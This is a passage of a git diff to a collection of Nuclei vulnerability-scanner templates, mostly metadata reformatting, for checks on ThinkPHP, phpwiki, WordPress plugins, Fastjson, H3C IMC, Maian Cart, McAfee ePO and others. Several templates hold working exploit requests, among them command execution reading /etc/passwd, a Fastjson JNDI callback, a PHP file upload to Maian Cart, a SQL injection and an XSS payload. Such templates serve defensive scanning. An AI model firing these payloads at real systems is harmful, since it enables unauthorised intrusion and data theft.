matchers-condition: and matchers: - type: word @@ -18,7 +23,8 @@ requests: - "<phpunit" - "</phpunit>" condition: and - - type: status status: - 200 + +# Enhanced by mp on 2022/02/09 diff --git a/poc/php/phpwiki-lfi-9568.yaml b/poc/php/phpwiki-lfi-9568.yaml index f9d300b410..b5d6e12ba6 100644 --- a/poc/php/phpwiki-lfi-9568.yaml +++ b/poc/php/phpwiki-lfi-9568.yaml @@ -3,9 +3,8 @@ info: name: phpwiki 1.5.4 - XSS / Local File Inclusion author: 0x_Akoko severity: high - description: A vulnerability in phpwiki allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint. reference: https://www.exploit-db.com/exploits/38027 - tags: phpwiki,lfi,xss + tags: phpwiki,lfi requests: - method: GET path: diff --git a/poc/php/thinkphp-509-information-disclosure-10752.yaml b/poc/php/thinkphp-509-information-disclosure-10752.yaml index 1e9cbb79ba..e1fd12a08d 100644 --- a/poc/php/thinkphp-509-information-disclosure-10752.yaml +++ b/poc/php/thinkphp-509-information-disclosure-10752.yaml @@ -1,22 +1,29 @@ id: thinkphp-509-information-disclosure + info: - name: ThinkPHP 5.0.9 Information Disclosure + name: ThinkPHP 5.0.9 - Information Disclosure author: dr_set severity: critical - description: Verbose SQL error message reveals sensitive information including database credentials. - reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/in-sqlinjection + description: ThinkPHP 5.0.9 includes verbose SQL error message that can reveal sensitive information including database credentials. + reference: + - https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/in-sqlinjection tags: thinkphp + requests: - method: GET path: - "{{BaseURL}}/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1" + matchers-condition: and matchers: - type: word + condition: and words: - "SQLSTATE" - "XPATH syntax error" - condition: and + - type: status status: - 500 + +# Enhanced by mp on 2022/04/20 diff --git a/poc/php/wp-phpfreechat-xss-11524.yaml b/poc/php/wp-phpfreechat-xss-11524.yaml index c908448c5d..6deb475d0b 100644 --- a/poc/php/wp-phpfreechat-xss-11524.yaml +++ b/poc/php/wp-phpfreechat-xss-11524.yaml @@ -4,7 +4,8 @@ info: name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://www.securityfocus.com/bid/54332/info + reference: + - https://www.securityfocus.com/bid/54332/info tags: wordpress,xss,wp-plugin requests: diff --git a/poc/python/django-debug-exposure-7030.yaml b/poc/python/django-debug-exposure-7030.yaml index 5a47ffdc6d..d2b8bf4545 100644 --- a/poc/python/django-debug-exposure-7030.yaml +++ b/poc/python/django-debug-exposure-7030.yaml @@ -3,8 +3,9 @@ id: django-debug-exposure info: name: Django Debug Exposure author: geeknik - reference: https://twitter.com/Alra3ees/status/1397660633928286208 severity: high + reference: + - https://twitter.com/Alra3ees/status/1397660633928286208 tags: django,exposure requests: diff --git a/poc/python/python-app-sql-exceptions-9744.yaml b/poc/python/python-app-sql-exceptions-9744.yaml index cf31580c01..43edeb6632 100644 --- a/poc/python/python-app-sql-exceptions-9744.yaml +++ b/poc/python/python-app-sql-exceptions-9744.yaml @@ -1,10 +1,11 @@ id: python-app-sql-exceptions info: name: Python App SQL Exception Check - description: Generic check for SQL exceptions in Python according to PEP 249 - reference: https://www.python.org/dev author: geeknik severity: medium + description: Generic check for SQL exceptions in Python according to PEP 249 + reference: + - https://www.python.org/dev tags: file,logs,python,sql file: - extensions: diff --git a/poc/remote_code_execution/cc-bcc-for-woocommerce-order-emails.yaml b/poc/remote_code_execution/cc-bcc-for-woocommerce-order-emails.yaml new file mode 100644 index 0000000000..39aec00e0d --- /dev/null +++ b/poc/remote_code_execution/cc-bcc-for-woocommerce-order-emails.yaml @@ -0,0 +1,59 @@ +id: cc-bcc-for-woocommerce-order-emails + +info: + name: > + CC & BCC for Woocommerce Order Emails <= 1.4.1 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e55f6d1d-b0b3-41e6-9ca9-c6e9f6dd34ed?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/cc-bcc-for-woocommerce-order-emails/" + google-query: inurl:"/wp-content/plugins/cc-bcc-for-woocommerce-order-emails/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,cc-bcc-for-woocommerce-order-emails,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cc-bcc-for-woocommerce-order-emails/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cc-bcc-for-woocommerce-order-emails" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.1') \ No newline at end of file diff --git a/poc/remote_code_execution/elex-woocommerce-xss-7199.yaml b/poc/remote_code_execution/elex-woocommerce-xss-7199.yaml index 8826c9772d..0a91138dfb 100644 --- a/poc/remote_code_execution/elex-woocommerce-xss-7199.yaml +++ b/poc/remote_code_execution/elex-woocommerce-xss-7199.yaml @@ -1,11 +1,19 @@ id: elex-woocommerce-xss + info: - name: ELEX WooCommerce Google Shopping < 1.2.4 - Reflected Cross-Site Scripting (XSS) + name: WordPress WooCommerce Google Shopping < 1.2.4 - Reflected Cross-Site Scripting author: dhiyaneshDk - severity: medium - description: The plugin does not sanitise or escape the search GET parameter before outputting back in the page, leading to a reflected Cross-Site Scripting issue, which will be executed in a logged in admin context. - reference: https://wpscan.com/vulnerability/647448d6-32c0-4b38-a40a-3b54c55f4e2e + severity: high + description: WordPress WooCommerce Google Shopping < 1.2.4 is susceptible to cross-site scripting because the plugin does not sanitize or escape the search GET parameter before outputting it back in the page and + executing it in a logged in admin context. + reference: + - https://wpscan.com/vulnerability/647448d6-32c0-4b38-a40a-3b54c55f4e2e + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-79 tags: wordpress,wp-plugin,xss,authenticated,woocommerce + requests: - raw: - | @@ -19,6 +27,7 @@ requests: - | GET /wp-admin/admin.php?page=elex-product-feed-manage&search=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}} + cookie-reuse: true matchers-condition: and matchers: @@ -26,10 +35,14 @@ requests: part: body words: - "</script><script>alert(document.domain)</script>" + - type: word part: header words: - text/html + - type: status status: - 200 + +# Enhanced by mp on 2022/04/13 diff --git a/poc/remote_code_execution/eyou-email-rce-7382.yaml b/poc/remote_code_execution/eyou-email-rce-7382.yaml index eabf03698d..16200da542 100644 --- a/poc/remote_code_execution/eyou-email-rce-7382.yaml +++ b/poc/remote_code_execution/eyou-email-rce-7382.yaml @@ -1,9 +1,14 @@ id: eyou-email-rce info: - name: eYou E-Mail system RCE + name: Eyou E-Mail <3.6 - Remote Code Execution author: pikpikcu severity: critical - reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g + description: Eyou Mail System before 3.6 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to admin/domain/ip_login_set/d_ip_login_get.php via the get_login_ip_config_file function. + reference: + - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g + - https://nvd.nist.gov/vuln/detail/CVE-2014-1203 + classification: + cve-id: CVE-2014-1203 tags: rce,eyou requests: - raw: @@ -17,8 +22,10 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body - type: status status: - 200 + +# Enhanced by mp on 2022/06/01 diff --git a/poc/remote_code_execution/fastjson-1-2-62-rce-7419.yaml b/poc/remote_code_execution/fastjson-1-2-62-rce-7419.yaml index 0b08215cde..7f16ccb998 100644 --- a/poc/remote_code_execution/fastjson-1-2-62-rce-7419.yaml +++ b/poc/remote_code_execution/fastjson-1-2-62-rce-7419.yaml @@ -1,17 +1,14 @@ id: fastjson-1-2-62-rce + info: - name: Fastjson 1.2.62 - Remote Code Execution + name: Fastjson 1.2.62 Deserialization RCE author: zh severity: critical - description: Fastjson 1.2.62 is susceptible to a deserialization remote code execution vulnerability. reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 tags: fastjson,rce,deserialization,oast + requests: - raw: - | @@ -23,15 +20,15 @@ requests: "@type":"org.apache.xbean.propertyeditor.JndiConverter", "AsText":"rmi://{{interactsh-url}}/exploit" } + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms DNS Interaction + part: interactsh_protocol # Confirms DNS Interaction words: - "dns" + - type: status negative: true status: - - 200 - -# Enhanced by mp on 2022/05/25 + - 200 \ No newline at end of file diff --git a/poc/remote_code_execution/forcepoint-7529.yaml b/poc/remote_code_execution/forcepoint-7529.yaml index 8cea816afa..3a37d0412f 100644 --- a/poc/remote_code_execution/forcepoint-7529.yaml +++ b/poc/remote_code_execution/forcepoint-7529.yaml @@ -1,5 +1,4 @@ id: forcepoint-login-panel - info: name: Forcepoint Login panel author: husain @@ -7,23 +6,18 @@ info: reference: - https://www.forcepoint.com/product/email-security tags: forcepoint,panel,login - requests: - method: GET path: - '{{BaseURL}}/pem/login/pages/login.jsf' - matchers-condition: and matchers: - - type: word words: - "Forcepoint Email Security" - - type: status status: - 200 - extractors: - type: regex part: body diff --git a/poc/remote_code_execution/forcepoint-applicance-7527.yaml b/poc/remote_code_execution/forcepoint-applicance-7527.yaml index 02c1ef2696..2341563e36 100644 --- a/poc/remote_code_execution/forcepoint-applicance-7527.yaml +++ b/poc/remote_code_execution/forcepoint-applicance-7527.yaml @@ -1,24 +1,20 @@ id: forcepoint-applicance - info: name: Forcepoint Appliance author: dhiyaneshDK severity: info metadata: - shodan-query: 'http.title:"Forcepoint Appliance"' + shodan-query: http.title:"Forcepoint Appliance" tags: panel,forcepoint - requests: - method: GET path: - '{{BaseURL}}' - matchers-condition: and matchers: - type: word words: - '<title>Forcepoint Appliance' - - type: status status: - 200 diff --git a/poc/remote_code_execution/gitlab-rce-7693.yaml b/poc/remote_code_execution/gitlab-rce-7693.yaml index cbd7704328..471055c70e 100644 --- a/poc/remote_code_execution/gitlab-rce-7693.yaml +++ b/poc/remote_code_execution/gitlab-rce-7693.yaml @@ -4,18 +4,18 @@ info: author: pdteam severity: critical description: GitLab CE/EE contains a vulnreability which allows a specially crafted image passed to a file parser to perform a command execution attack. Versions impacted are between 11.9-13.8.7, 13.9-13.9.5, and 13.10-13.10.2. + remediation: Upgrade to versions 13.10.3, 13.9.6, 13.8.8, or higher. reference: - https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/ - https://hackerone.com/reports/1154542 - https://nvd.nist.gov/vuln/detail/CVE-2021-22205 + metadata: + shodan-query: http.title:"GitLab" classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cve-id: CVE-2021-22205 cwe-id: CWE-20 - remediation: Upgrade to versions 13.10.3, 13.9.6, 13.8.8, or higher. - metadata: - shodan-query: http.title:"GitLab" tags: cve,cve2021,gitlab,rce,oast,intrusive requests: - raw: diff --git a/poc/remote_code_execution/h3c-imc-rce-7868.yaml b/poc/remote_code_execution/h3c-imc-rce-7868.yaml index d433226cf0..7448e95f74 100644 --- a/poc/remote_code_execution/h3c-imc-rce-7868.yaml +++ b/poc/remote_code_execution/h3c-imc-rce-7868.yaml @@ -1,21 +1,40 @@ id: h3c-imc-rce + info: - name: H3c IMC Rce + name: H3c IMC RCE author: pikpikcu severity: critical - reference: https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw + description: A vulnerability in H3C IMC allows remote unauthenticated attackers to cause the remote web application to execute arbitrary commands via the 'dynamiccontent.properties.xhtml' endpoint + reference: + - https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw + metadata: + fofa-query: body="/imc/javax.faces.resource/images/login_help.png.jsf?ln=primefaces-imc-new-webui" tags: rce,h3c-imc + requests: - - method: POST - path: - - "{{BaseURL}}/imc/javax.faces.resource/dynamiccontent.properties.xhtml" - body: | - pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=cat%20/etc/passwd + - raw: + - | + POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd={{command}} + + payloads: + command: + - 'cat /etc/passwd' + - 'type C:\\Windows\\win.ini' + + stop-at-first-match: true matchers-condition: and matchers: - type: regex + part: body regex: - - "root:.*:0:0" + - "root:.*:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or + - type: status status: - 200 diff --git a/poc/remote_code_execution/hashicorp-consul-rce-7891.yaml b/poc/remote_code_execution/hashicorp-consul-rce-7891.yaml index a6c12973c3..b631c96023 100644 --- a/poc/remote_code_execution/hashicorp-consul-rce-7891.yaml +++ b/poc/remote_code_execution/hashicorp-consul-rce-7891.yaml @@ -1,10 +1,13 @@ id: hashicorp-consul-rce + info: name: Hashicorp Consul Services Api RCE author: pikpikcu severity: critical - reference: https://www.exploit-db.com/exploits/46074 + reference: + - https://www.exploit-db.com/exploits/46074 tags: hashicorp,rce,oast,intrusive + requests: - raw: - | # Create USER @@ -22,6 +25,7 @@ requests: "Timeout": "86400s" } } + matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction diff --git a/poc/remote_code_execution/icewarp-webclient-rce-8129.yaml b/poc/remote_code_execution/icewarp-webclient-rce-8129.yaml index 9d560da3c0..861af1af2a 100644 --- a/poc/remote_code_execution/icewarp-webclient-rce-8129.yaml +++ b/poc/remote_code_execution/icewarp-webclient-rce-8129.yaml @@ -1,10 +1,15 @@ id: icewarp-webclient-rce info: - name: IceWarp WebClient RCE + name: IceWarp WebClient - Remote Code Execution author: gy741 severity: critical + description: | + IceWarp WebClient is susceptible to remote code execution. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 tags: icewarp,rce - reference: https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E requests: - raw: - | @@ -16,9 +21,11 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "Microsoft Windows [Version" - part: body - type: status status: - 302 + +# Enhanced by mp on 2022/05/30 diff --git a/poc/remote_code_execution/lotuscms-rce-8652.yaml b/poc/remote_code_execution/lotuscms-rce-8652.yaml index e9cf4de15f..3092588555 100644 --- a/poc/remote_code_execution/lotuscms-rce-8652.yaml +++ b/poc/remote_code_execution/lotuscms-rce-8652.yaml @@ -4,7 +4,8 @@ info: name: LotusCMS 3.0 eval() RCE author: pikpikcu severity: critical - reference: https://github.com/Hood3dRob1n/LotusCMS-Exploit + reference: + - https://github.com/Hood3dRob1n/LotusCMS-Exploit tags: lotuscms,rce requests: diff --git a/poc/remote_code_execution/maian-cart-preauth-rce-8720.yaml b/poc/remote_code_execution/maian-cart-preauth-rce-8720.yaml index 6e747a2bbf..6888e6a4f2 100644 --- a/poc/remote_code_execution/maian-cart-preauth-rce-8720.yaml +++ b/poc/remote_code_execution/maian-cart-preauth-rce-8720.yaml @@ -1,14 +1,16 @@ id: maian-cart-preauth-rce + info: name: Maian Cart 3.8 preauth RCE author: pdteam severity: critical description: A severe vulnerability has been kindly reported to me by security advisor DreyAnd. The issue concerns the elFinder file manager plugin in Maian Cart and it affects all versions from 3.0 to 3.8. reference: | - - https://dreyand.github.io/maian-cart-rce/ - - https://github.com/DreyAnd/maian-cart-rce - - https://www.maianscriptworld.co.uk/critical-updates + - https://dreyand.github.io/maian-cart-rce/ + - https://github.com/DreyAnd/maian-cart-rce + - https://www.maianscriptworld.co.uk/critical-updates tags: rce,unauth,maian + requests: - raw: - | @@ -17,6 +19,7 @@ requests: Accept-Encoding: gzip, deflate Accept: */* Connection: close + - | POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1 Host: {{Hostname}} @@ -31,12 +34,14 @@ requests: Content-Length: 97 cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e + - | GET /product-downloads/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Accept: */* Connection: close + extractors: - type: regex name: hash @@ -44,8 +49,10 @@ requests: group: 1 regex: - '"hash"\:"(.*?)"\,' + + req-condition: true matchers: - type: dsl dsl: - - 'contains(body_3, "{{randstr_1}}")' + - 'contains(body_3, "{{randstr_1}}")' \ No newline at end of file diff --git a/poc/remote_code_execution/makecommerce.yaml b/poc/remote_code_execution/makecommerce.yaml new file mode 100644 index 0000000000..c6631a335c --- /dev/null +++ b/poc/remote_code_execution/makecommerce.yaml @@ -0,0 +1,59 @@ +id: makecommerce + +info: + name: > + MakeCommerce for WooCommerce <= 3.5.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e46e8a7e-4032-4357-9553-d03bdf168383?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/makecommerce/" + google-query: inurl:"/wp-content/plugins/makecommerce/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,makecommerce,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/makecommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "makecommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.5.1') \ No newline at end of file diff --git a/poc/remote_code_execution/mcafee-epo-rce-8790.yaml b/poc/remote_code_execution/mcafee-epo-rce-8790.yaml index 1c5ef6900f..247e0168fc 100644 --- a/poc/remote_code_execution/mcafee-epo-rce-8790.yaml +++ b/poc/remote_code_execution/mcafee-epo-rce-8790.yaml @@ -1,33 +1,34 @@ -id: mcafee-epo-rce -info: - name: McAfee ePolicy Orchestrator RCE - author: dwisiswant0 - severity: high - description: | - A ZipSlip vulnerability in McAfee ePolicy Orchestrator (ePO) - is a type of Path Traversal occurring when archives are unpacked - if the names of the packed files are not properly sanitized. - An attacker can create archives with files containing “../” in their names, - making it possible to upload arbitrary files - to arbitrary directories or overwrite existing ones during archive extraction. - - References: - - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/ - tags: mcafee,rce -requests: - - method: GET - path: - - "{{BaseURL}}/stat.jsp?cmd=chcp+437+%7c+dir" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "text/html" - part: header - - type: regex - regex: - - "Volume (in drive [A-Z]|Serial Number) is" - part: body +id: mcafee-epo-rce + +info: + name: McAfee ePolicy Orchestrator RCE + author: dwisiswant0 + severity: high + description: | + A ZipSlip vulnerability in McAfee ePolicy Orchestrator (ePO) + is a type of Path Traversal occurring when archives are unpacked + if the names of the packed files are not properly sanitized. + An attacker can create archives with files containing "../" in their names, + making it possible to upload arbitrary files + to arbitrary directories or overwrite existing ones during archive extraction. + reference: + - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/ + tags: mcafee,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/stat.jsp?cmd=chcp+437+%7c+dir" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "text/html" + part: header + - type: regex + regex: + - "Volume (in drive [A-Z]|Serial Number) is" + part: body \ No newline at end of file diff --git a/poc/remote_code_execution/nuuo-nvrmini2-rce-9171.yaml b/poc/remote_code_execution/nuuo-nvrmini2-rce-9171.yaml index 2db9a198f3..796d2d2c88 100644 --- a/poc/remote_code_execution/nuuo-nvrmini2-rce-9171.yaml +++ b/poc/remote_code_execution/nuuo-nvrmini2-rce-9171.yaml @@ -3,11 +3,17 @@ info: name: NUUO NVRmini 2 3.0.8 - Remote Code Execution author: berkdusunur severity: critical - tags: rce,nuuo + description: | + NUUO NVRmini 2 3.0.8 is susceptible to remote code execution. reference: - https://www.exploit-db.com/exploits/45070 - https://github.com/berkdsnr/NUUO-NVRMINI-RCE - https://packetstormsecurity.com/files/151573/NUUO-NVRmini-upgrade_handle.php-Remote-Command-Execution.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: rce,nuuo,nvrmini requests: - method: GET path: @@ -15,9 +21,11 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "/upload_tmp_dir/" - part: body - type: status status: - 200 + +# Enhanced by mp on 2022/05/30 diff --git a/poc/remote_code_execution/opensns-rce-9320.yaml b/poc/remote_code_execution/opensns-rce-9320.yaml index 6f18aa24aa..4fc481fa49 100644 --- a/poc/remote_code_execution/opensns-rce-9320.yaml +++ b/poc/remote_code_execution/opensns-rce-9320.yaml @@ -1,12 +1,14 @@ id: opensns-rce info: - name: OpenSNS Remote Code Execution Vulnerability + name: OpenSNS - Remote Code Execution author: gy741 severity: critical - description: A vulnerability in OpenSNS allows remote unauthenticated attackers to cause the product to execute arbitrary code via the 'shareBox' endpoint. - reference: - - http://www.0dayhack.net/index.php/2417/ - - https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E + description: | + OpenSNS allows remote unauthenticated attackers to execute arbitrary code via the 'shareBox' endpoint. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 tags: opensns,rce requests: - method: GET @@ -16,10 +18,10 @@ requests: matchers-condition: and matchers: - type: regex + part: body regex: - "((u|g)id=)" - "Microsoft Windows" - part: body condition: or - type: word words: @@ -27,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/30 diff --git a/poc/remote_code_execution/oscommerce-rce-9407.yaml b/poc/remote_code_execution/oscommerce-rce-9407.yaml index 31bd9d2852..efb08659bf 100644 --- a/poc/remote_code_execution/oscommerce-rce-9407.yaml +++ b/poc/remote_code_execution/oscommerce-rce-9407.yaml @@ -1,11 +1,10 @@ id: oscommerce-rce info: - name: osCommerce 2.3.4.1 - Remote Code Execution author: Suman_Kar - severity: high + name: osCommerce 2.3.4.1 - Remote Code Execution description: A vulnerability in osCommerce's install.php allows remote unauthenticated attackers to injecting PHP code into the db_database parameter, and subsequently use the configure.php page to to read the command's executed output - reference: - - https://www.exploit-db.com/exploits/50128 + reference: https://www.exploit-db.com/exploits/50128 + severity: high tags: rce,oscommerce requests: - raw: diff --git a/poc/remote_code_execution/pdf-signer-ssti-to-rce-9470.yaml b/poc/remote_code_execution/pdf-signer-ssti-to-rce-9470.yaml index 02e42a7bb9..e130378dbf 100644 --- 